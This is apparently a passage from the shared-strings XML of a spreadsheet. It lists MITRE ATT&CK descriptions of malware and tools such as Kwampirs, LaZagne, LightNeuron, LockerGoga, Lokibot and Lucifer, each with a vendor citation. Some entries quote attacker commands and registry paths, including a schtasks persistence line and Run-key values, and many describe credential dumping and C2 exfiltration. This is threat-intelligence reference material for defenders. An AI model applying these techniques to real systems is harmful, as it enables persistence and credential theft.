    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects password policy information with the command &lt;code&gt;net accounts&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of running services with the command &lt;code&gt;tasklist /v&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of available servers with the command &lt;code&gt;net view&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) uses rundll32.exe in a Registry value added to establish persistence.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) copies itself over network shares to move laterally on a victim network.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects OS version information such as registered owner details, manufacturer details, processor type, available storage, installed patches, hostname, version info, system date, and other system information by using the commands &lt;code&gt;systeminfo&lt;/code&gt;, &lt;code&gt;net config workstation&lt;/code&gt;, &lt;code&gt;hostname&lt;/code&gt;, &lt;code&gt;ver&lt;/code&gt;, &lt;code&gt;set&lt;/code&gt;, and &lt;code&gt;date /t&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects network adapter and interface information by using the commands &lt;code&gt;ipconfig /all&lt;/code&gt;, &lt;code&gt;arp -a&lt;/code&gt; and &lt;code&gt;route print&lt;/code&gt;. It also collects the system's MAC address with &lt;code&gt;getmac&lt;/code&gt; and domain configuration with &lt;code&gt;net config workstation&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of active and listening connections by using the command &lt;code&gt;netstat -nao&lt;/code&gt; as well as a list of available network mappings with &lt;code&gt;net use&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects registered owner details by using the commands &lt;code&gt;systeminfo&lt;/code&gt; and &lt;code&gt;net config workstation&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of running services with the command &lt;code&gt;tasklist /svc&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) creates a new service named WmiApSrvEx to establish persistence.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[LOWBALL](https://attack.mitre.org/software/S0042) uses the Dropbox cloud storage service for command and control.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[LOWBALL](https://attack.mitre.org/software/S0042) uses the Dropbox API to request two files, one of which is the same file as the one dropped by the malicious email attachment. This is most likely meant to be a mechanism to update the compromised host with a new version of the [LOWBALL](https://attack.mitre.org/software/S0042) malware.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[LOWBALL](https://attack.mitre.org/software/S0042) command and control occurs via HTTPS over port 443.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>/etc/passwd and /etc/shadow</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can obtain credential information from /etc/shadow using the shadow.py module.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can perform credential dumping from MSCache to obtain account and password information.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can obtain credentials from chats, databases, mail, and WiFi.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can obtain credentials from databases, mail, and WiFi across multiple platforms.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can obtain credentials from web browsers such as Google Chrome, Internet Explorer, and Firefox.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can obtain credentials from macOS Keychains.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can perform credential dumping from LSA secrets to obtain account and password information.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can perform credential dumping from memory to obtain account and password information.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>Proc Filesystem</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can obtain credential information running Linux processes.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can obtain credentials from Vault files.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) contains a function to encrypt and store emails that it collects.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) can be configured to automatically collect files under a specified directory.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) can be configured to automatically exfiltrate files under a specified directory.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) can collect files from a local system.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) has used AES and XOR to decrypt configuration files and commands.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) exfiltrates data over its email C2 channel.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) has a function to delete files.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) has the ability to download and execute additional files.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) can store email data in files and directories specified in its configuration, such as &lt;code&gt;C:\Windows\ServiceProfiles\NetworkService\appdata\Local\Temp\&lt;/code&gt;.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) uses SMTP for C2.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) has used filenames associated with Exchange and Outlook for binary and configuration files, such as &lt;code&gt;winmail.dat&lt;/code&gt;.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) is capable of starting a process using CreateProcess.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) encrypts its configuration files with AES-256.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>Remote Email Collection</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) collects Exchange emails matching rules specified in its configuration.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) can be configured to exfiltrate data during nighttime or working hours.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) is controlled via commands that are embedded into PDFs and JPGs using steganographic methods.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) uses AES to encrypt C2 traffic.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) gathers the victim computer name using the Win32 API call &lt;code&gt;GetComputerName&lt;/code&gt;.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) gathers information about network adapters using the Win32 API call &lt;code&gt;GetAdaptersInfo&lt;/code&gt;.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>Transmitted Data Manipulation</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) is capable of modifying email content, headers, and attachments during transit.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>Transport Agent</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) has used a malicious Microsoft Exchange transport agent for persistence.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) is capable of executing commands via cmd.exe.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can obtain data from local systems.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can change C2 servers.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can delete files.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can list contents of drives and search for files.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can download files onto compromised hosts.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can retrieve a list of running processes.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can change the frequency at which compromised hosts contact remote C2 infrastructure.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can retrieve system information.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can start a remote shell.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>[Linux Rabbit](https://attack.mitre.org/software/S0362) sends the payload from the C2 server as an encoded URL parameter. (Citation: Anomali Linux Rabbit 2018)</t>
  </si>
  <si>
    <t>[Linux Rabbit](https://attack.mitre.org/software/S0362) attempts to gain access to the server via SSH.(Citation: Anomali Linux Rabbit 2018)</t>
  </si>
  <si>
    <t>[Linux Rabbit](https://attack.mitre.org/software/S0362) brute forces SSH passwords in order to attempt to gain access and install its malware onto the server. (Citation: Anomali Linux Rabbit 2018)</t>
  </si>
  <si>
    <t>[Linux Rabbit](https://attack.mitre.org/software/S0362) opens a socket on port 22 and if it receives a response it attempts to obtain the machine's hostname and Top-Level Domain. (Citation: Anomali Linux Rabbit 2018)</t>
  </si>
  <si>
    <t>Unix Shell Configuration Modification</t>
  </si>
  <si>
    <t>[Linux Rabbit](https://attack.mitre.org/software/S0362) maintains persistence on an infected machine through rc.local and .bashrc files. (Citation: Anomali Linux Rabbit 2018)</t>
  </si>
  <si>
    <t>[Linux Rabbit](https://attack.mitre.org/software/S0362) acquires valid SSH accounts through brute force. (Citation: Anomali Linux Rabbit 2018)</t>
  </si>
  <si>
    <t>[LoJax](https://attack.mitre.org/software/S0397) has modified the Registry key &lt;code&gt;‘HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute’&lt;/code&gt; from &lt;code&gt;‘autocheck autochk *’&lt;/code&gt; to &lt;code&gt;‘autocheck autoche *’&lt;/code&gt;.(Citation: ESET LoJax Sept 2018)</t>
  </si>
  <si>
    <t>[LoJax](https://attack.mitre.org/software/S0397) has loaded an embedded NTFS DXE driver to be able to access and write to NTFS partitions.(Citation: ESET LoJax Sept 2018)</t>
  </si>
  <si>
    <t>[LoJax](https://attack.mitre.org/software/S0397) has modified the Registry key &lt;code&gt;‘HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute’&lt;/code&gt; from &lt;code&gt;‘autocheck autochk *’&lt;/code&gt; to &lt;code&gt;‘autocheck autoche *’&lt;/code&gt; in order to execute its payload during Windows startup.(Citation: ESET LoJax Sept 2018)</t>
  </si>
  <si>
    <t>[LoJax](https://attack.mitre.org/software/S0397) is a UEFI BIOS rootkit deployed to persist remote access software on some targeted systems.(Citation: ESET LoJax Sept 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[LoJax](https://attack.mitre.org/software/S0397) is a UEFI BIOS rootkit deployed to persist remote access software on some targeted systems.(Citation: ESET LoJax Sept 2018) </t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) has been observed changing account passwords and logging off current users.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) has been signed with stolen certificates in order to make it look more legitimate.(Citation: Wired Lockergoga 2019)</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) has encrypted files, including core Windows OS files, using RSA-OAEP MGF1 and then demanded Bitcoin be paid for the decryption key.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)(Citation: Wired Lockergoga 2019)</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) installation has been immediately preceded by a "task kill" command in order to disable anti-virus.(Citation: Wired Lockergoga 2019)</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) has been observed deleting its original launcher after execution.(Citation: CarbonBlack LockerGoga 2019)</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) has been observed moving around the victim network via SMB, indicating the actors behind this ransomware are manually copying files form computer to computer instead of self-propagating.(Citation: Unit42 LockerGoga 2019)</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) has been observed shutting down infected systems.(Citation: Wired Lockergoga 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has stolen credentials from multiple applications and data sources including Windows OS credentials, email clients, FTP, and SFTP clients.(Citation: Infoblox Lokibot January 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has demonstrated the ability to steal credentials from multiple applications and data sources including Safari and the Chromium and Mozilla Firefox-based web browsers.(Citation: Infoblox Lokibot January 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has the ability to initiate contact with command and control (C2) to exfiltrate stolen data.(Citation: FSecure Lokibot November 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has the ability to copy itself to a hidden file and directory.(Citation: Infoblox Lokibot January 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has the ability to capture input on the compromised host via keylogging.(Citation: FSecure Lokibot November 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has been executed through malicious documents contained in spearphishing e-mails.(Citation: TrendMicro Msiexec Feb 2018)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has obfuscated strings with base64 encoding.(Citation: Infoblox Lokibot January 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has used process hollowing to inject into legitimate Windows process vbc.exe.(Citation: Infoblox Lokibot January 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has used several packing methods for obfuscation.(Citation: Infoblox Lokibot January 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has the ability to discover the computer name and Windows product name/version.(Citation: FSecure Lokibot November 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has the ability to discover the domain name of the infected host.(Citation: FSecure Lokibot November 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has the ability to discover the username on the infected host.(Citation: FSecure Lokibot November 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has used HTTP for C2 communications.(Citation: Infoblox Lokibot January 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) side loads its communications module as a DLL into the &lt;code&gt;libcurl.dll&lt;/code&gt; loader.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) has a function that decrypts malicious data.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) removes itself after execution and can delete files on the system.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) can retrieve file listings from the victim machine.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) has a C2 proxy tool that masquerades as &lt;code&gt;GUP.exe&lt;/code&gt;, which is software used by Notepad++.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) uses a custom binary protocol over sockets for C2 communications.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) can list running processes.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) sets up a Registry Run key to establish a persistence mechanism.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) can take desktop screenshots.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) can kill processes and delete services.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) uses a modified version of RC4 for data transfer.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) can enumerate services on the victim machine.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) can shutdown and reboot the victim machine.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) has used VBA macros in Microsoft Word attachments to drop additional files to the host.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582)’s C2 proxy tool sends data to a C2 server over HTTP.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) executes the &lt;code&gt;cmd.exe&lt;/code&gt; command.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) is typically bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) deleted installation files after completion.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) has set the attributes of the VirtualBox directory and VBoxVmService parent directory to "hidden".(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) used SCP to update the miner from the C2.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) added plist files in &lt;code&gt;/Library/LaunchDaemons&lt;/code&gt; with RunAtLoad set to true.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) launched the QEMU services in the &lt;code&gt;/Library/LaunchDaemons/&lt;/code&gt; folder using &lt;code&gt;launchctl&lt;/code&gt;.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) used an MSI installer to install the virtualization software.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) has obfuscated various scripts and encrypted DMG files.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) used plists to execute shell scripts and maintain persistence on boot. [LoudMiner](https://attack.mitre.org/software/S0451) also added plist files in &lt;code&gt;/Library/LaunchDaemons&lt;/code&gt; with KeepAlive set to true, which would restart the process if stopped.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) used the &lt;code&gt;ps&lt;/code&gt; command to monitor the running processes on the system.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) harvested system resources to mine cryptocurrency, using XMRig to mine Monero.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>Run Virtual Instance</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) has used QEMU and VirtualBox to run a Tiny Core Linux virtual machine, which runs XMRig and makes connections to the C2 server for updates.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) started the cryptomining virtual machine as a service on the infected machine.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) has monitored CPU usage.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) used a script to gather the IP address of the infected machine before sending to the C2.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) used shell scripts to launch various services and to start/stop the QEMU virtualization.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) used a batch script to run the Linux virtual machine as a service.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) can automatically launch a Linux virtual machine as a service at startup if the AutoStart option is enabled in the VBoxVmService configuration file.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[Lslsass](https://attack.mitre.org/software/S0121) can dump active logon session password hashes from the lsass process.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can use the Stratum protocol on port 10001 for communication between the cryptojacking bot and the mining server.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can clear and remove event logs.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can decrypt its C2 address upon execution.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can exploit multiple vulnerabilities including EternalBlue (CVE-2017-0144) and EternalRomance (CVE-2017-0144).(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can download and execute a replica of itself using [certutil](https://attack.mitre.org/software/S0160).(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can use [certutil](https://attack.mitre.org/software/S0160) for propagation on Windows hosts within intranets.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can execute TCP, UDP,  and HTTP denial of service (DoS) attacks.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can scan for open ports including TCP ports 135 and 1433.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) has attempted to brute force TCP ports 135 (RPC) and 1433 (MSSQL) with the default username or list of usernames and    passwords.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can identify the process that owns remote connections.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can check for existing stratum cryptomining information in &lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\spreadCpuXmr – %stratum info%&lt;/code&gt;.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can persist by setting Registry key values &lt;code&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Run\QQMusic&lt;/code&gt; and &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\QQMusic&lt;/code&gt;.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can use system resources to mine cryptocurrency, dropping XMRig to mine Monero.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can infect victims by brute forcing SMB.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) has established persistence by creating the following scheduled task &lt;code&gt;schtasks /create /sc minute /mo 1 /tn QQMusic ^ /tr C:Users\%USERPROFILE%\Downloads\spread.exe /F&lt;/code&gt;.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) has used UPX packed binaries.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can perform a decremental-xor encryption on the initial C2 request before sending it over the wire.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can check for specific usernames, computer names, device drivers, DLL's, and virtual devices associated with sandboxed environments and can enter an infinite loop and stop itself if any are detected.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can collect the computer name, system architecture, default language, and processor frequency of a compromised host.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can collect the IP address of a compromised host.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can identify the IP and port numbers for all remote connections from the compromised host.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) has the ability to identify the username on a compromised host.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can crash a debugger by passing a format string to &lt;code&gt;OutputDebugStringA()&lt;/code&gt;.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can issue shell commands to download and execute additional payloads.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lucifer](https://attack.mitre.org/software/S0532) can use WMI to log into remote machines for propagation.(Citation: Unit 42 Lucifer June 2020)</t>
  </si>
  <si>
    <t>[Lurid](https://attack.mitre.org/software/S0010) can compress data before sending it.(Citation: Villeneuve 2011)</t>
  </si>
  <si>
    <t>[Lurid](https://attack.mitre.org/software/S0010) performs XOR encryption.(Citation: Villeneuve 2011)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) has the ability to upload files from an infected device.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can modify processes to prevent them from being visible on the desktop.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) has the ability to remove set Registry Keys.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can upload additional files to a compromised host.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) has been named Readme.txt to appear legitimate.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can Base64 encode output strings prior to sending to C2.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can use Registry Run Keys for persistence.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can use scheduled tasks for persistence.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can use HTTPS in communication with C2 web servers.(Citation: Secureworks MCMD July 2019)</t>
  </si>
  <si>
    <t>[MCMD](https://attack.mitre.org/software/S0500) can launch a console process (cmd.exe) with redirected standard input and output.(Citation: Secureworks MCMD July 2019)</t>
  </si>
